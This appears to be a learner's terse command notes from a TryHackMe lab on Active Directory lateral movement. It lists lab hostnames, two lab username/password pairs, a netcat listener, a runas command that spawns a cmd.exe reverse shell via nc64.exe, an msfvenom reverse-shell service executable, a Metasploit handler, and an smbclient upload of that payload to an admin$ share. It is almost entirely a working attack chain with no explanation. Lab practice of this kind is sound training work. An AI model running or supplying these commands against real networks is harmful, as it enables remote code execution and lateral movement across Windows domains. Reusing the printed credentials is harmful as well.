TryHackMe | Cyber Security Training


cat /etc/hosts
#TryHackMe
10.200.74.101 THMDC.za.tryhackme.com
10.200.74.201 THMIIS.za.tryhackme.com distributor.za.tryhackme.com
10.200.74.249 THMJMP2.za.tryhackme.com
#Local Seting
127.0.0.1 localhost
127.0.1.1 kali
http://distributor.za.tryhackme.com/creds
Username: barbara.taylor
Password: Knockers2015?
User: ZA.TRYHACKME.COM\\t1_leonard.summers
Password: EZpass4ever
ssh [email protected]
nc -lvnp 4443
runas /netonly /user:ZA.TRYHACKME.COM\\t1_leonard.summers "c:\\tools\\nc64.exe -e cmd.exe 10.150.74.17 4443"
msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=10.150.74.17 LPORT=4444 -o georgel.exe
msfconsole -q -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST lateralmovement; set LPORT 4444;exploit"
smbclient -c 'put georgel.exe' -U t1_leonard.summers -W ZA '//thmiis.za.tryhackme.com/admin$/' EZpass4ever